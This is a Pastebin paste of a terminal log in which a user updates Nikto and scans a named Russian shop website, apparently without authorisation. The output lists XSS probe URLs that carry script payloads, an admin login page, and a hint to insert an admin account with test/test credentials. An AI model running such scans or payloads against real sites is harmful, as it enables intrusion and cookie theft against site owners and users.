API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 17th, 2016
564
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.50 KB | None | 0 0
raw download clone embed print report
  1. Hacker@Antares MINGW64 ~/nikto-2.1.5
  2. $ ./nikto.pl -update
  3. + Retrieving 'nikto_report_csv.plugin'
  4. + Retrieving 'nikto_cookies.plugin'
  5. + Retrieving 'db_tests'
  6. + Retrieving 'nikto_headers.plugin'
  7. + Retrieving 'db_parked_strings'
  8. + Retrieving 'CHANGES.txt'
  9. + CIRT.net message: Please submit Nikto bugs to https://github.com/sullo/nikto
  10.  
  11. Hacker@Antares MINGW64 ~/nikto-2.1.5
  12. $ ./nikto.pl -host rexant-shop.ru
  13. - Nikto v2.1.5
  14. ---------------------------------------------------------------------------
  15. + Target IP:          90.156.201.84
  16. + Target Hostname:    rexant-shop.ru
  17. + Target Port:        80
  18. + Start Time:         2016-10-17 18:29:34 (GMT3)
  19. ---------------------------------------------------------------------------
  20. + Server: Apache
  21. + Cookie PHPSESSID created without the httponly flag
  22. + The anti-clickjacking X-Frame-Options header is not present.
  23. + Server banner has changed from 'Apache' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
  24. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for detail                                                        s.
  25. + OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the '                                                        prefix' variable.
  26. + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http                                ://www.cert.org/advisories/CA-2000-02.html.
  27. + OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
  28. + OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.o                                rg/advisories/CA-2000-02.html.
  29. + /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
  30. + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-20                                00-02.html.
  31. + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XS                                S). http://www.cert.org/advisories/CA-2000-02.html.
  32. + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&Se                                archContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/adviso                                ries/CA-2000-02.html.
  33. + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/C                                A-2000-02.html.
  34. + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
  35. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  36. + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
  37. + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
  38. + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  39. + OSVDB-3092: /news: This might be interesting...
  40. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
  41. + OSVDB-3233: /icons/README: Apache default file found.
  42. + /admin/login.php: Admin login page/section found.
  43. + Cookie 226776f356d7ecf58b60bab12a05d38f created without the httponly flag
  44. + Cookie 21e558d425bf38e4a2473c40a5b0b2b9 created without the httponly flag
  45. + 6545 items checked: 0 error(s) and 23 item(s) reported on remote host
  46. + End Time:           2016-10-17 18:35:16 (GMT3) (342 seconds)
  47. ---------------------------------------------------------------------------
  48. + 1 host(s) tested
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!